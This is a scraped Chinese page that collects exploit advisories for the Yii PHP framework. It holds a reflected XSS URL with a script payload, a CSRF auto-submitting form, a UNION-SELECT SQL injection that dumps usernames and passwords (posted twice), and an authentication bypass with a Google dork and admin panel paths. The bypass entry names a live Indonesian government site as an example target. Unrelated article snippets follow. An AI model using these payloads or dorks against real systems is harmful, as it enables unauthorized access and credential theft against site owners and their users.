一 Yii Framework 2.0.9 - Cross Site ScriptingPublished

# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting

# Discovery Date: 2019-02-12

# Exploit Author: Gionathan "John" Reale

# Vendor Homepage: https://www.yiiframework.com/

# Version: 2.0.9

# CVE : 2018-6010

In Yii Framework 2.x before 2.0.14, an reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.

Example:

http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E

  

二 Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability

#################################################################################################

# Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability

# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army

# Date : 01/07/2018

# Vendor Homepage : yiiframework.com

# Tested On : Windows

# Software Download and Installation Links : packagist.org/packages/mdmsoft/yii2-admin ~

github.com/yii2mod/yii2-rbac ~ github.com/mdmsoft/yii2-admin

+ yiiframework.com/extension/rbac-manager  ~ yiiframework.com/extension/yii2-admin ~

+  travis-ci.org/mdmsoft/yii2-admin  ~ scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master

+ codeclimate.com/github/mdmsoft/yii2-admin

# Category : WebApps

# Versions : 2.x and 3.x

# Exploit Risk : Medium

# CWE : CWE-287 [ Improper Authentication ]

#################################################################################################

# Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication Vulnerability

Yii Framework yii2-admin RBAC Manager for Yii 2

GUI manager for RABC (Role Base Access Control) Yii2. Easy to manage authorization of user 

Features of the Product [ Software ]

Manage RBAC System in intuitive Tree-View

Ceep cool with rekursion protection in RBAC Tree

Generate PHP Code

Full relational move, create, edit, delete support of RBAC Tree items.

Assign and eject multiple Roles to and from multiple Users

Create predefined buisness Rules for User Assignments

Assign Roles in Secure Mode

By Controller protected and not changeable Roles and Assignments

Use easy checkAccess() methods in your Controller

Create easy bizRule Code in your RBAC Roles and Assignments

################################################################################################

# Description for Improper Authentication Vulnerability [ CWE-287 ]

+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

+ If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering

(e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges

within the application or disclose sensitive information.

+ If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page:

+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.

+ Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration.

+ The attacker might be able to gain unauthorized access to the application and otherwise

restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code.

+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.

Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]

#################################################################################################

# Google Dork  : inurl:''/emusrenbang/web/index.php?r=''

# Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin

# Exploit : No Username. No Password. No Need for Login Credentials. Web don't need login. 

Just enter this link after URL Link.

/emusrenbang/web/index.php?r=admin

Whatever you give an exploit like [ anything' OR 'x'='x ]  or [  '=''or' ] and many others as SQL Authentication Bypass. 

It always says that '' Incorrect username or password. '' But we will jump over the admindoor wall. 

This is called as Improper Authentication Vulnerability.

127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] =>  archive.is/BLaE5

127.0.0.1/emusrenbang/web/index.php?r=admin  => [ Proof of Concept ] => archive.is/D9dKP

Useable Admin Control Panel URL Links => 

/emusrenbang/web/index.php?r=admin

/emusrenbang/web/index.php?r=admin%2Fassignment

/emusrenbang/web/index.php?r=admin%2Frole

/emusrenbang/web/index.php?r=admin%2Fpermission

/emusrenbang/web/index.php?r=admin%2Froute

/emusrenbang/web/index.php?r=admin%2Frule

/emusrenbang/web/index.php?r=admin%2Fmenu

/emusrenbang/web/index.php?r=admin%2Fdefault%2Findex

#################################################################################################

Indonesia Government Site [ Bappeda Provinsi Sumatera Utara 2016  ] is only vulnerable website.

# Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu 

# [ Proof of Concept ] => archive.is/lCRem

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

  

三 Yii Framework Blog Cross Site Request Forgery

# Exploit Title: Yii Framework Blog Application CSRF Vulnerability

# Date: 3 Mar 2014

# Author: Christy Philip Mathew

# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/

# Category:: web

# Tested on: Windows 8

Attacker will be able to create a post.

<html>

  <body>

    <form action="

http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">

      <input type="hidden" name="Post[title]" value="test" />

      <input type="hidden" name="Post[content]" value="test" />

      <input type="hidden" name="Post[tags]" value="test" />

      <input type="hidden" name="Post[status]" value="2" />

      <input type="hidden" name="yt0" value="Create" />

      <input type="submit" value="Submit form" />

    </form>

  </body>

</html>

  

四 Yii Framework Search SQL Injection Vulnerability

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability

# Google Dork: No Dork

# Date: 20/11/2012

# Exploit Author: Juno_okyo

# Vendor Homepage: http://www.yiiframework.com/

# Software Link: http://www.yiiframework.com/download/

# Version: 1.1.8 (maybe another version)

#

####

Vulnerability:

##################################

SQL Injection via search form. You can query to get some info about

administrator account and something...

##################################

Exploitation:

##################################

' UNION SELECT

1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31

fRom user-- -

##################################

More Details:

##################################

Website: http://junookyo.blogspot.com/

About Exploit:

http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html

##################################

Great thanks to Juno_okyo and James - J2TeaM

##################################

  

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability

# Google Dork: No Dork

# Date: 20/11/2012

# Exploit Author: Juno_okyo

# Vendor Homepage: http://www.yiiframework.com/

# Software Link: http://www.yiiframework.com/download/

# Version: 1.1.8 (maybe another version)

#

####

Vulnerability:

##################################

SQL Injection via search form. You can query to get some info about

administrator account and something...

##################################

Exploitation:

##################################

' UNION SELECT

1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31

fRom user-- -

##################################

More Details:

##################################

Website: http://junookyo.blogspot.com/

About Exploit:

http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html

##################################

Great thanks to Juno_okyo and James - J2TeaM

##################################

Yii Framework 漏洞整理的更多相关文章

  1. Yii框架(Yii Framework)部署

    一.下载Yii 在部署yii框架之前首先要搭建好php环境,这里就不说搭建环境的问题了(这里已经部署好wampserver了),环境搭建好后,到yii官方网站下载yii framework:http: ...

  2. 拓展Yii Framework(易框架)

    1.拓展yii 此文针对Yii1.1.15而写,请注意甄别你的Yii Framework 版本. 拓展yii是开发期间常见的代码处理方式.例如,你写一个新的controller(业务控制器),你通过继 ...

  3. YII Framework学习教程-YII的异常处理

    异常无处不在,作为程序员,活着就是为了创造这些异常,然后修复这些异常而存在的.YII框架封装了PHP的异常,让异常处理起来更简单. 使用 YII处理错误和异常的配置方法: 你可以在入口文件中定义YII ...

  4. Yii Framework 开发教程Zii组件-Tabs示例

    有关Yii Tab类: http://www.yiichina.com/api/CTabView http://www.yiichina.com/api/CJuiTabs http://blog.cs ...

  5. Yii framework 应用总结小窍门(转)

    1. Yii Framework] 如何获取当前controller的名称? 下面语句就可以获取当前控制器的名称了! Yii::app()->controller->id 2. yii 如 ...

  6. YII Framework学习教程-YII的Model-开发规范-路径别名-命名空间

    到这里,大概的YII开发已经基本可以,但是下面要将的所有课程,学完之后可以让你更爱YII.下面的教程是讲的MVC的M,model.数据,业务,代码的集中地区.所以开始之前,学学开发规范-路径别名-命名 ...

  7. Yii Framework隐藏index.php文件的步骤

    Yii Framework隐藏index.php文件的步骤 作者:feebas 发布于:2012-4-23 13:36 Monday 分类:Yii Framework 1.开启apache的mod_r ...

  8. PHP框架 Yii framework 用yiic命令时提示“php.exe”不是内部或外部命令

    解决方案 yii/framework/yiic.bat,修改 if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exei ...

  9. Yii框架的学习指南(策码秀才篇)1-1 如何认识Yii framework

    Yii的框架和其他框架的区别在于:它是更加 快速,安全,专业的PHP框架 Yii是一个高性能的,适用于开发WEB2.0应用的PHP框架. Yii是一个基于组件.用于开发大型 Web 应用的 高性能 P ...

随机推荐

  1. 多线程高并发编程(7) -- Future源码分析

    一.概念 A Future计算的结果. 提供方法来检查计算是否完成,等待其完成,并检索计算结果. 结果只能在计算完成后使用方法get进行检索,如有必要,阻塞,直到准备就绪. 取消由cancel方法执行 ...

  2. vue-双向响应数据底层原理分析

    总所周知,vue的一个大特色就是实现了双向数据响应,数据改变,视图中引用该数据的部分也会自动更新 一.双向数据绑定基本思路 “数据改变,视图中引用该数据的部分也会自动更新“,从这句话,我们可以分析出以 ...

  3. 解密C语言编译背后的过程

    我们大部分程序员可能都是从C语言学起的,写过几万行.几十万行.甚至上百万行的代码,但是大家是否都清楚C语言编译的完整过程呢,如果不清楚的话,我今天就带着大家一起来做个解密吧. C语言相对于汇编语言是一 ...

  4. 【Linux基础总结】Shell 基础编程

    Shell 基础编程 重启虚拟机遇到磁盘损坏如何解决 Shell编程中变量的声明.引用及作用域 Shell程序 概述 以文件形式存放批量的Linux命令集合,该文件能够被Shell解释执行,这种文件就 ...

  5. 画结构图的神器 Graphviz

    经常看到别人的论文里各种优美的图,没想过它们是怎么来的,前两天也是在看论文的时候被推荐了一款画图软件graphviz,稍微了解了一下这个画图软件,据说是贝尔实验室的几位牛人开发出来的,试了一下觉得很不 ...

  6. Windows 10 IoT Core用PWM控制器控制树莓派LED灯亮度

    我接到一个需求,需要调节LED灯的亮度,且是从上位机进行控制,我了解到树莓派也有PWM,就准备通过PWM来控制灯的亮度. PWM又叫脉宽调制,是用微处理器的数字输出来对模拟电路进行控制,对模拟信号电平 ...

  7. Akko海洋之星

    今天(2020.5.14)入手Akko海洋之星84茶轴,开心呀~~ 考虑方面: 价格>键线分离>接线接口>轴体>键帽>材质 价格: 200~500之间入门级cherry轴 ...

  8. python机器学习笔记:EM算法

    EM算法也称期望最大化(Expectation-Maximum,简称EM)算法,它是一个基础算法,是很多机器学习领域的基础,比如隐式马尔科夫算法(HMM),LDA主题模型的变分推断算法等等.本文对于E ...

  9. 给出两个单词(start和end)与一个字典,找出从start到end的最短转换序列

    问题 给出两个单词(start和end)与一个字典,找出从start到end的最短转换序列.规则如下: 一次只能改变一个字母 中间单词必须在字典里存在 例如: 给出 start = "hit ...

  10. ql的python学习之路-day8

    前言:本节主要学习的是函数的全局变量和局部变量以及递归 一.全局变量和局部变量 定义在函数外并且在函数头部的变量,叫做全局变量,全局变量在整个代码中都生效. 局部变量只在函数里生效,这个函数就叫做这个 ...